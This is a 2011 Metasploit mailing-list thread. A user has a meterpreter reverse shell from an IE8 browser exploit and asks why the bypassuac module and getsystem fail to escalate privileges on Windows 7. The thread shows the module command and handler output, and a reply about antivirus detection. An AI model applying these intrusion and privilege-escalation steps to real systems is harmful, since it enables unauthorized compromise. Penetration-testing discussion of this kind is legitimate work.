Metasploit mailing list archives

Re: BypassUAC not working against Windows 7 x86


From: firstname lastname <psykosonik_frequenz () yahoo com>
Date: Sun, 4 Dec 2011 00:09:00 -0800 (PST)

I guess you missed my note at the end of my post, which says that there is no sort of AV running on the target 
machine.

I even captured the network traffic while the exploit was run and the bypassuac script was executed. There was no 
executable present in the PCAP file either. There were files only specific to the Browser Exploit.

Regards,
NeonFlash


________________________________
 From: Drforbin <drforbin6 () gmail com>
To: firstname lastname <psykosonik_frequenz () yahoo com> 
Cc: framework () spool metasploit com 
Sent: Sunday, December 4, 2011 10:21 AM
Subject: Re: [framework] BypassUAC not working against Windows 7 x86
 

I think what is happening is the AV is finding the meterpreter shellcode executable which bypassuac uploads to the 
system...I had this same issue and tracked it down to this.
Metasploit executables, even when encoded, can be found pretty easily by some AV software.


drforbin.


I hope this helps...let me know.






On 12/03/2011 11:00 PM, firstname lastname wrote: 
I am trying to gain Local System Privileges on a Windows 7 x86 target system. I have a meterpreter reverse tcp shell on 
the victim's machine after a successful browser exploit on MSIE version 8.0 running on the target machine.


sysinfo output:

Computer        : Neon-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

getuid output:

Server username: Neon-PC\Neon


Next I run the bypass uac script as follows:


use post/windows/escalate/bypassuac


Output:


[*] Started reverse handler on 192.168.2.6:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....



Next, when I type in getsystem, I still get the error as:


priv_elevate_getsystem: Operation failed: Access is denied.



I have gone through the Ruby script, bypassuac.rb, and it looks like it's executing properly till the end. As a last step, 
after uploading the UAC bypass agent to the target machine, it has to execute it.


But it looks like that is not happening. I even checked the %temp% directory on the target Windows machine for the 
presence of any exe and did not find one.


Any help here would be appreciated.


PS: I have disabled the Windows 7 Firewall as well, just in case that would be blocking any transfer of files. Also, 
there's no third-party antivirus installed on the target machine.


Regards,
NeonFlash







_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework 